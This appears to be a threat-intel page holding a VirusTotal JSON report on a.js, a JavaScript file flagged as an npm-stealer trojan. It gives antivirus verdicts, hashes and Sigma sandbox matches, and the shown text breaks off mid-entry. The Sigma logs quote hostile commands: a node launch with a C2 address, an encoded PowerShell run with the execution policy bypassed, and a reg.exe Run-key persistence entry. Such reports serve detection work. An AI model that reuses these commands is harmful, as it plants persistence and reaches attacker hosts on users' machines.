a84412efcc457c5666f23b3d44cae281
Hash
- MD5: a84412efcc457c5666f23b3d44cae281
- SHA1: ae81b945ae8fe52211c399ffdafd45c77d8c1fab
- SHA256: cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066
- First Seen: 2026-06-20
- Last Seen: 2026-06-20
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal file report (API v3 JSON) for a.js, a 5,414-byte JavaScript file. At last analysis 15 engines flagged it malicious and 43 returned no detection (2 failures, 14 type-unsupported); the vendor-consensus label is trojan.npmsteal. The Sigma matches below come from a sandbox run and show node.exe launching a dropped Temp script with the argument 23.254.164.123:443, and reg.exe creating the HKCU ...\CurrentVersion\Run\NvmProtocal value that relaunches node.exe on C:\ProgramData\NodePackages\protocal.cjs — pivot indicators worth checking even though the page lists no related IOCs.
{
"data": {
"id": "cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066"
},
"attributes": {
"sha1": "ae81b945ae8fe52211c399ffdafd45c77d8c1fab",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 0,
"medium": 7,
"low": 3
}
},
"meaningful_name": "a.js",
"type_tags": [
"source",
"javascript",
"js"
],
"last_submission_date": 1780048232,
"type_tag": "javascript",
"last_analysis_date": 1781896491,
"tlsh": "T122B120185E44B404577BB7719B3A60F5FAB28B2382802907B53CA7A07FB4C28DDD1E30",
"vhash": "65a8fb30dbd5ec83a8d96a21b624b703",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260619",
"category": "malicious",
"result": "javascript.trojan.npmsteal"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/NpmSteal.a"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260619",
"category": "malicious",
"result": "Trojan.Script.Agent"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.239",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.58.59880",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.58.59880",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1232",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/TrojanDownloader.Agent.AEOL trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260619",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260619",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260619",
"category": "malicious",
"result": "HEUR:Trojan.Script.Generic"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260619",
"category": "malicious",
"result": "Dropper.DR/SNH"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5625",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.15146",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1781888514",
"engine_update": "20260619",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260619",
"category": "malicious",
"result": "DR/SNH"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38743",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260619",
"category": "malicious",
"result": "Trojan:Win32/Qwexlafiba!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107675",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44970AVA:64.31444",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260619",
"category": "malicious",
"result": "ABTrojan.RHNN-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.1.10706",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-19.02",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/NpmSteal.a"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "f43e059:f43e059:1e47ea2:1e47ea2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260619",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[dropper]:Javascript/NpmSteal.DK8PHU"
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260619",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260619",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260618-08",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260614",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.790",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260618",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
}
},
"magika": "JAVASCRIPT",
"type_extension": "js",
"unique_sources": 1,
"ssdeep": "96:r3loW+bsT/RNIaVs0uVt9bSbLuykS8SmN+zPjMs3uRYwJ9JA0n:TiW+IT/R20I7+/uykS8SM+zPjMguRYwr",
"reputation": 0,
"tags": [
"long-sleeps",
"javascript",
"idle"
],
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"sigma_analysis_stats": {
"critical": 0,
"high": 0,
"medium": 7,
"low": 3
},
"last_modification_date": 1781904054,
"crowdsourced_yara_results": [
{
"ruleset_id": "0122a7f913",
"ruleset_version": "0122a7f913|589bbefc22847193cac455858fa15e627d671918",
"ruleset_name": "Windows_API_Function",
"rule_name": "Windows_API_Function",
"match_date": 1781896855,
"description": "This signature detects the presence of a number of Windows API functionality often seen within embedded executables. When this signature alerts on an executable, it is not an indication of malicious behavior. However, if seen firing in other file types, deeper investigation may be warranted.",
"author": "InQuest Labs",
"source": "https://github.com/InQuest/yara-rules-vt"
}
],
"md5": "a84412efcc457c5666f23b3d44cae281",
"names": [
"a.js"
],
"size": 5414,
"sha256": "cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066",
"magic": "ASCII text, with very long lines (809u), with CRLF line terminators",
"sigma_analysis_results": [
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"EventID": "1",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Get-Process | Select-Object -ExpandProperty ProcessName\"",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "8b5db9da5732dc549b0e8b56fe5933d7c95ed760f3ac20568ab95347ef8c5bcc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "CurrentVersion Autorun Keys Modification",
"rule_description": "Detects modification of autostart extensibility point (ASEP) in registry.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventID": "13",
"Details": "powershell -w h -c \"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\"",
"Image": "C:\\Windows\\system32\\reg.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvmProtocal"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "aa87efb252a9cf7bb1fb0114336bd08c338bc9046dd498d187c209cd94ddbc6a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE",
"rule_description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry",
"rule_author": "Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Registry Console Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b5f76af9d8101930af8d4fee71f3a5395b47eff6bb88e581db02bf890242d79b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Direct Autorun Keys Modification",
"rule_description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"Description": "Registry Console Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "cfe58f03c01bfef6fd133a3da09440cc5613a5dbeb310ee795cc443e18538943",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell In Registry Run Keys",
"rule_description": "Detects potential PowerShell commands or code within registry run keys",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\system32\\reg.exe",
"Details": "powershell -w h -c \"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\"",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvmProtocal"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "dc48d8314d305b4c97b9f813958e20738bb989b83928e70ea811bb7c0bf7e197",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific - ProcessCreation",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"Description": "Registry Console Tool",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb75f9de2201bfad4ef177dca85b0b8fa8e5a86ba2357af5301f72acbc5eb144",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Execution of Powershell with Base64",
"rule_description": "Commandline to launch powershell with a base64 payload",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Get-Process | Select-Object -ExpandProperty ProcessName\"",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
